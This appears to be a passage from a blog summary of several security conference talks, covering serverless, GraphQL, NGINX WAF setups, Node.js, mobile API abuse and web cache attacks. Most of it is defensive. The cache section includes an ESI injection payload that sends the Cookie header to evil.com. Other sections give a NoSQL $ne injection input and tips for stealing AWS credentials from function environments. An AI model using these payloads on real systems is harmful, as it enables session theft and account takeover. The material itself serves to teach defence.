Function data event injection vulnerabilities are hard to test for, as execution is largely out-of-band.

Further, as mentioned previously, functions have a wide variety of execution scenarios and are thus hard to protect with WAFs or other network security controls, as events may be triggered by multiple types of non-HTTP protocols.

Privilege Escalation - IAM and Other Misconfigurations

Permissions are a common source of security issues in FaaS, as functions tend to be given overly permissive capabilities for the resources they interact with. Issues range from public S3 buckets, having access to all DynamoDB tables, or having non-required permissions that give an attacker who finds a bug in the function to escalate their privileges.

Note: AWS credentials are often stored in the function’s environment variables, so if a vulnerability allows you to examine the target function’s environment you can extract them and start pivoting as that function’s AWS role.

Other Weaknesses

Authorization weaknesses, especially with JSON Web Tokens (JWTs) can be common as well as DoS attacks that exploit weaknesses in third-party library code.

Attacker’s view of GraphQL

GraphQL is subject to the same standard OWASP-style web vulnerabilities you’d see in any web app or API. However, a core challenge is that as the GraphQL ecosystem is still young, there’s little framework support for common functionality, meaning devs have to take a lot of the responsibility that standard web frameworks like Django handle for you.

Thus, it’s important to keep the following core areas in mind: access controls, input validation, query whitelisting, and rate limiting.

Abhay believes the most prominent and important vulnerability classes for GraphQL are authorization and info disclosure flaws, potentially NoSQL injection, and denial-of-service.

GraphQL Introspection (Information Disclosure)

GraphQL let’s you introspect the server’s API, showing all actions, types (aka DB tables), and fields (aka columns) that are accessible.

This makes it easier to for an attacker to leak sensitive info (they can easily see what’s available) as well as potential mass assignment-style bugs, as the attacker can learn all of the attributes for each type.

GraphiQL
GraphiQL is an IDE with autocomplete and introspection capabilities for GraphQL APIs. Think Postman for GraphQL (Click to enlarge)

Injection with GraphQL

Unlike REST APIs, where there’s generally a single query per function, GraphQL resolvers are written for a larger query space. With NoSQL databases, this could lead to injection (and potentially RCE) if dynamic scripting is enabled, in backends like MongoDB, Elasticsearch, etc.

Denial of Service (DoS)

Nested queries can lead to server-side resource exhaustion or high cloud provider bills, especially with many-to-many fields.

For example, an Employee may have a reference to their Team, and Team may have a reference to all of the Employees on that team. An attacker can craft a malicious query that finds an employee, then that employee’s team, then all of the employees on the team, then…

Resources

Building Cloud-Native Security for Apps and APIs with NGINX

Stepan Ilyin, Co-founder, Wallarm
abstract slides video

How NGINX modules and other tools can be combined to give you a nice dashboard of live malicious traffic, automatic alerts, block attacks and likely bots, and more.

NGINX is a good place to implement protections for several reasons: traffic in many environments is already passed through NGINX reverse-proxies, the Kubernetes Ingress Controller is based on NGINX, and it can be easily deployed as a side-car for a microservice.

Chapter 1. APIs and microservices security with NGINX

WAF for APIs/Microservices in Kubernetes

In NGINX, you can enable ModSecurity with:

location / {
  ModSecurityEnabled on;
  ModSecurityConfig modsecurity.conf;
  proxy_pass http://localhost:8011;
  proxy_read_timeout 180s; 
}

For an the ingress controller, enable the flag in the configmap:

apiVersion: v1
kind: ConfigMap
metadata:  
  name: nginx-configuration-external  n
  amespace: ingress-nginx
data:  
  enable-modsecurity: "true"  
  enable-owasp-modsecurity-crs: "true"

Enabling ModSecurity in Kubernetes:

metadata:  
  annotations:    
    nginx.ingress.kubernetes.io/configuration-snippet: |
      modsecurity_rules '
        SecRuleEngine On
        SecAuditLog /var/log/modsec/audit.log 
        SecAuditLogParts ABCIJDEFHZ
        SecAuditEngine RelevantOnly
      ';

Building a security dashboard to gain visibility of malicious traffic

By enabling ModSecurity we’re now blocking some malicious requests, but it’d be nice to have some insight into what malicious traffic we’re seeing. Here’s how to build a dashboard with open source tools.

Building a dashboard with NGINX, Fluentd and Elasticsearch
Logs are stored in /var/log/modsec/audit.log, which are then parsed by fluentd and sent to Elasticsearch. Logs are visualized in Kibana and automatic alerts are set up using ElastAlert.

Fluentd can be run as a sidecar in the ingress-nginx pod, and sharing a volume mount between ingress-nginx and Fluentd allows Fluentd to access the ModSecurity logs.

Visualizing Traffid Data with Kibana
Awww yeah, graphs!

Dashboards are nice, but you don’t want to have to always be watching them. Instead, we’d like automatic alerts to ensure we don’t miss anything.

Yelp open sourced ElastAlert, a simple framework for alerting on anomalies, spikes, or other interesting patterns of data in Elasticsearch.

Example alerts
  • Match where there are at least X events in Y time (frequency type)
  • Match when the rate of events increases or decreases (spike type)
  • Match when a certain field matches a blacklist/whitelist (blacklist and whitelist type)
  • Match on any event matching a given filter (any type)
  • Match when a field has two different values within some time (change type)
  • Match when a never before seen term appears in a field (new_term type)

Alerts can be sent to a number of external systems, such as e-mail, Jira, OpsGenie / VictorOps / PagerDuty, chat apps (HipChat / Slack / Telegram / Gitter), and Twilio.

Mirroring traffic for async analysis with 3rd party tools

When you’re integrating a new service into your production traffic flow, it’s crucial to make sure you don’t break things. This is often a concern with tools like WAFs, whose false positives may block legitimate user traffic.

NGINX has a mirror mode in which it sends every request to an additional backend (e.g. a WAF), which enables you to determine the effects of the new tool you’re considering while ensuring that nothing breaks.

location / {
  mirror /mirror;
  proxy_pass http://backend;
}  

location /mirror {
  internal;
  proxy_pass http://mirror_backend$request_uri;  
}

WAFs for NGINX

ModSecurity

ModSecurity is an open source WAF that can be efficient in detecting and blocking common web app security attacks (e.g. OWASP Top 10). It supports virtual patching and is quite customizable.

Challenges:

  • Default rulesets tend to result in a huge number of false positives.
  • As with any signature-based tool, it requires tuning, which can be challenging.
  • Signatures can’t block every attack, a creative attacker can bypass them.

Best practice:

  • Monitoring mode: Use the public ruleset
  • Blocking mode: craft rules from scratch sspecifically for your apps and API

To learn more, see the ModSecurity Handbook. Christian Folini has a nice blog post on how to tune your WAF installation to reduce false positives

Naxsi

Naxsi doesn’t rely on complex signatures but instead looks for “dangerous” characters and expressions. It uses a small set of simple scoring rules containing 99% of known patterns involved in web vulnerabilities. For example, <, |, and drop are generally not supposed to be part of a URI.

Each time any of the characters or expressions in an incoming HTTP request match one of the rules, Naxsi increases the “score” of the request (SQLi, XSS, …). If a request’s score is above a threshold, the request is blocked.

Sometimes these patterns may match legitimate queries, so you need to configure whitelists to avoid false positives.

  • Pros: Naxsi is resistant to many WAF-bypass techniques
  • Cons: You need to use LearningMode with every significant code deployment.

Repsheet (behaviour based security)

Repsheet is a reputation engine designed to help manage threats against web apps. It uses a behavior-based approach to detect malicious and fraudulent activity, using different resources to score incoming requests: HTTP header info, GeoIP, ModSecurity alerts, external feeds, and any custom rules you’ve set up.

Protecting against Bots and DDoS

Testcookie-nginx acts as a filter between bots and the backend using L7 DDoS attacks, helping you to filter out junk requests. This works because HTTP-flooding bots are often dumb and lack browser features such as HTTP cookies and supporting redirects.

Testcookie-nginx works by doing a series of checks to determine if the requesting client supports cookies, JavaScript, and Flash, and if it can perform HTTP redirects.

  • Pro: Blocks many (dumb) bots and prevents automatic scraping
  • Con: Cuts out the Google bot and does not protect against sophisticated bots, for example, those that use a full browser stack.

Analyze web server logs for anomalies

You can use AI to detect bots using a neural network (e.g. PyBrain), and determine which requests during a DDoS are legitimate. A Dropbox engineer wrote a PoC of this approach here. The access.log file before the DDoS attack is useful for NN/ML training because it should list mostly your legitimate clients.

Block traffic from data centers, cloud / hosting providers and Tor

You could use GeoIP to ban all traffic from a country or area using [ngx_http_geoip_module](https://nginx.org/en/docs/http/ngx_http_geoip_module.html). This tends to be a bad practice, as GeoIP data may not be accurate.

You could block the IP ranges of popular cloud providers, as requests from their ranges may be more likely to be bots. Each platform lists their IP ranges: GCP, AWS, Azure.

You could also block Tor exit nodes, proxies / anonymizers / etc. using a commercial feed like MaxMind, or specific malicious IPs using services like Project HoneyPot.

Disable resource-intensive application endpoints

L7 DDoS attacks often look for resource-intensive endpoints, such as /search, that can be queried in a way to make the server do a lot of computation and/or use up memory.

NGINX supports a custom HTTP code 444 that allows you to close the connection and return nothing in the response.

location /search {
  return 444;
}

Limit buffer, timeouts, connections in NGINX

If you’re under a DDoS, there are several NGINX directives you can tweak:

  • Limiting buffers: client_header_buffer_size, large_client_header_buffers, client_body_buffer_size, client_max_body_size
  • Timeouts: reset_timeout_connection, client_header_timeout, client_body_timeout, keepalive_timeout, send_timeout

Inducing Amnesia in Browsers: the Clear Site Data Header

Caleb Queern, Cyber Security Servicies Director, KPMG
abstract slides video

The new Clear-Site-Data HTTP header allows a website to tell a user’s browser to clear various browsing data (cookies, storage, cache, executionContexts) associated with the website.

This enables websites to have more fine-grained control over the data its users store in their browser. This can be used to ensure that certain sensitive info is not persistently stored, to wipe traces of having visited the site (for example, users living under a regime visiting an “unapproved” site), or for a site affected by a persistent XSS vulnerability to reset users to a “clean” state.

From an offensive point of view, the Clear-Site-Data header could be used to:

  1. Wipe traces of a user having visited a malicious site (e.g. drive-by-download malware), making incident response more difficult.
  2. Flush cookies in competing subdomains, making session fixation attacks easier.
    • e.g. Attacker sends a Clear-Site-Data header to erase cookies (or cache, localStorage, …) from foo.example.com for example.com, affecting bar.example.com.

Security is ultimately about reducing risk, sustainably, at the right cost.

Node.js and NPM Ecosystem: What are the Security Stakes?

Vladimir de Turckheim, Software Engineer, Sqreen
abstract slides video

Talk structure: some history and background about NodeJS, overview of several vulnerability classes, attacks on the NPM ecosystem, and best practice security recommendations.

For vulnerabilities, a SQL injection example is given as well as regular expression denial of service, the latter of which can be found by vuln-regex-detector.

The most interesting, JavaScript-specific vulnerability described was object injection, which occurs when an application expects data of a certain type to be provided (e.g. a number or string), but instead a different type (e.g. a JavaScript object) is provided, significantly changing the behavior of the code.

app.post(/documents/find, (req, res) => {
 const query = { };
 if (req.body.title) query.title = req.body.title;
 if (req.body.desiredType) query.type = req.body.desiredType;
 Document.find(query).exec()
  .then((r) => res.json(r));
}

In this code, an endpoint is querying a NoSQL database, expecting req.body to have a value like { desiredType: 'blog'}, which would result in the query: { type: "blog" }.

However, if an attacker provided an input like { desiredType: { $ne: 0 } }, the resulting query would be { type: { $ne: 0 } }. Since the type field in the database is a string, all records’ type fields will not be equal to 0 ($ne: 0), so all records will be returned, like a NoSQL version of or 1=1.

Ecosystem attacks: most NPM libraries have a huge number of direct and indirect dependencies, which exposes a large supply chain attack surface. Vladimir discusses when ESLint was backdoored as an example.

Recommendations:

  • Keep NodeJS up to date
  • Review any use of critical core modules - carefully sanitize any user input that reaches fs, child_process, and vm
  • Data validation is not native in JavaScript, sanitize inputs using a library like joi
  • Monitor your dependencies for known issues
  • Monitor your dependency tree (anvaka) - some libraries that perform the same functionality have significantly fewer dependencies than others. Minimize your attack surface.

Preventing Mobile App and API Abuse

Skip Hovsmith, Principal Engineer, CriticalBlue
abstract slides video

An overview of the mobile and API security cat and mouse game (securely storing secrets, TLS, cert pinning, bypassing protections via decompiling apps and hooking key functionality, OAuth2, etc.), described through an example back and forth between a package delivery service company and an attacker-run website trying to exploit it.

Skip walks through several mobile and API security best practices via an example company ShipFast, a package delivery service company with a mobile app and API, and ShipRaider, an attacker-run website that aims to exploit security issues in ShipFast for their benefit.

This talk does a nice job of showing how security is a cat and mouse game between attackers and defenders, especially in mobile apps, where the defender’s code is being run on devices the attacker controls.

Client Side Security Doesn’t Exist
The tl;dr of this talk, which will be unsurprising to anyone who’s been in security more than a few months, is that client side security is for the most part impossible. If an attacker has complete control over the environment in which your code is running (e.g. mobile app running on the attacker’s device, JavaScript running in the attacker’s browser, etc.), you can try to slow them down, but they can dismantle your protections eventually, given enough time, effort, and skill.

But, it’s still instructive to see the various defenses that can be used and how they can be bypassed, so let’s get into it.

App Identity Using API Keys

First, ShipFast might include an API key in the app so that the backend can verify that the request is coming from the app they expect.

But, this API key might get leaked to GitHub accidentally, or the attacker can decompile the app and ismply extract it.

The defender can try to mitigate abuse if the API key is leaked by attempting to detect API probing, app layer DDoS attacks, data scraping, credential stuffing, and by setting quotas, spike arrests, and concurrency limits (which may vary by how expensive the call is, and can be fixed or load adaptive). Stripe has a nice blog post about the leaky bucket rate limiting pattern: Scaling your API with rate limiters.

The defender can also do some behavioral analysis of API requests to detect abuse based on sequences of calls that should be impossible in practice, for example, a driver checking in all over the city faster than it would be possible to get there.

Secure Communication: Protect secrets in transit

ShipFast may try to protect secrets in transit using TLS, but ShipRaider can install their own certificate on the device so they can man-in-the-middle the traffic.

ShipFast may then try to prevent this by using certificate pinning, where the client keeps a whitelist of trusted certificates and only accepts connections from those, but ShipRaider can simply hook the pinning check using tools like SSL-TrustKiller and Frida, and have them always return true, all is well.

Certificate pinning does impose some upkeep costs when used, as certs must be managed, the private keys stored securely, and the certs may expire or be revoked.

Remove Secret from the Channel

ShipFast may then try to not send a secret off the device at all, but instead use the client secret to compute some HMAC signature that it sends instead which the server can verify.

However, again, the attacker can simple decompile the app (using tools like dex2jar and apktool for Android apps) and find the secret.

ShipFast may then instead try to calculate the secret at runtime so there’s not a static value that can be extracted. However, ShipRaider can simply do runtime hooking and/or repackage the app to better support debugging to read the secret after it’s been calculated.

App Hardening Approaches

There are several app hardening steps that can be taken that raise the effort required by the attacker, but are still fundamentally bypassable given enough time.

Custom Secret Computation: Split a static secret into pieces, functionally recompute secret at runtime.

Obfuscation and Anti-Tamper: Obfuscate app code and make it tamper resistant, making code comprehension harder. (still vulnerable to hooking type attacks)

White-Box Cryptography: Represent a secret by its obfuscated operations - hide a function, a piece of functionality you drop in the app, instead of a secret value (can still be hooked)

Software and Hardware Backed KeyStores: These allow performing operations without exposing keys and have nice security properties, but using hardware backed keystores correctly can be challenging.

User Authentication: It’s really about App Authorization

Finally, Skip describes the OAuth2 protocol, discusses some of the common flows (Outh2 code grant flow, refresh tokens, OAuth2 Proof of Key Code Exchange (PKCE)), and then shows a few patterns aimed at further reducing attack surface via how secrets are handled.

Mobile Abuse: OAuth2 Flow
Note: OAuth2 is actually about authorization, not authentication.
Secrets as a Service API Proxy Pattern App Integrity Measurement Strengthening OAuth2 Flow
Approaches to reducing your mobile attack surface (Click to enlarge)

In the end, Skip recommends this final architecture pattern:

Mobile Abuse- Final Recommended Architecture
Click to enlarge

Resources

Cache Me If You Can: Messing with Web Caching

Louis Dion-Marcil, Information Security Analyst, Mandiant
abstract slides video

In this talk, Louis covers 3 web cache related attacks: cache deception, edge side includes, and cache poisoning.

Note: this was an awesomely dense, technical talk. I won’t cover all of the details here, I encourage you to check out the video and slides if you want the full details.

Cache Deception

Web cache deception abuses URL-based caching mechanisms by tricking users’ browser into requesting URLs that will have their sensitive info cached. The attacker can then obtain the cached content.

Web cache deception was originally published in 2017 by Omer Gil and demonstrated against PayPal.

Impact: Depends on the context, but some examples include stealing security questions, CSRF tokens, or really any sensitive data (like on an admin panel).

Cache Me: Deception URLs
By appending /a.jpg to the URL we’re causing it to be cached
Cache Me: Stealing CSRF
An example 2-stage attack to 1) steal CSRF tokens and then 2) use it

Conditions: Web cache deception can occur when the application server does not include an ending match delimiter, such as the following Django example:

urlpatterns = [
  url(r'^/profile/security-questions', views.questions, ...),
  # NOTE: there is no matching delimiter, any trailing 
  # text will match
]

# This is the fix
urlpatterns = [
  url(r'^/profile/security-questions$', views.questions, ...),
  # The $ matches end of the path string
]

Mitigations:

  • Your app should not return “200 OK” to garbage requests.
  • The cache server should not ignore caching headers.
  • Cloudflare’s solution: the filetype must match the response Content-Type header.

There’s a Burp extension by TrustWave Web Cache Deception Scanner that can test for these vulnerabilities.

Edge Side Include Injection (ESII)

ESI includes allow application to control the cache: they can cache dynamic files, invalidate cache entries, and make decisions based on the user’s state.

Cache Me: ESI Server Include
The end user sees a single HTTP response, but the cache server may see multiple fragments, some static, some dynamic
<html>
  ...
  <i>Monday</i>
  <esi:include src="http://api.local/Montreal/Monday" />
  ...
</html>

When the cache server fetches a file for a user, it sees the XML tags in the response and parses them.

Cache Me: ESII Diagram

ESI variables refer to variables about metadata about the current HTTP transaction.

<!-- Access 'PHPSESSID' cookie -->
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> 

<!-- Exfiltate 'Cookie' header -->
<img name="evil.com/<esi:vars>
          $(HTTP_HEADER{Cookie})
  </esi:vars>">

Impact: ESII can steal cookies (even those with the HTTPOnly flag) and headers, likely enabling an attacker to do full account takeovers. It can also be used for SSRF, defacing, header injection, and in the right context even RCE.

Louis walks through an example of examining Oracle’s Web Cache 11g.

Detection: You can use tools like the Burp Active Scan++ or Upload Scanner plugins, Acunetix, or Qualys.

Mitigation: You can encode HTML entities, but overall the fix can be tricky because very few ESI implementations can differentiate between a JSON and HTML response. So you may be encoding HTML entities in HTML responses, but what if an attacker puts an ESI include tag in a JSON response?

{
  "username": "attacker",  
  "fullname": "<esi:include src=intranet/status />"
}

For more details, see Louis’ detailed blog post: Beyond XSS: Edge Side Include Injection.

Web Cache Poisoning

Web cache poisoning was documented in August 2018 by James Kettle in his BlackHat USA talk (blog post). It leverages unsafe/unknown usage of HTTP headers coupled with caching.

Modern caching keys cache entries using several properties, not just the path/filename, as the same path may return different content (e.g. based on requested language, encoding headers, etc.)

Cache Me: Poisoning Overview
If the X-Forwarded-Host header overrides the content of the Host header and the Host header is used to specify the domain in the link (http://foo), then your self-XSS might get cached by the server, affecting the next user to request index.php. Thus, the web cache is your XSS delivery mechanism.

The X-Forwarded-Host header is used to tell the origin server which “Host” was requested by the client. There are tons of similar headers used by applications, and most are secret. However, you can use OSINT and brute forcing to discover them.

Impact: XSS, DoS, and more!

James Kettle’s Burp extension Param Miner can be used to identify hidden, unlinked parameters, and is particularly useful for finding web cache poisoning vulnerabilities.